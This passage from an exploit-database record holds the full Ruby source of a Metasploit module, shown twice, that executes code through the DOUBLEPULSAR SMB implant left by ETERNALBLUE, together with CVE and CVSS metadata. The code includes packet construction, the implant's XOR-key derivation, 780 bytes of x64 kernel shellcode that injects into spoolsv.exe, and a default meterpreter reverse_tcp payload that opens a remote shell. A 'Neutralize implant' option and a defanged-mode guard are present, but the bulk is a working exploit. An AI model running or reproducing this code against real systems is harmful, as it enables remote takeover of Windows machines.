simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-22] #"}, "lastseen": "2021-09-22T06:19:54", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cbe618f8f646a702278f71d2c3dfeeaf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-22T22:14:58", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27802"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", 
"MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-22T22:14:58", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-22T22:14:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
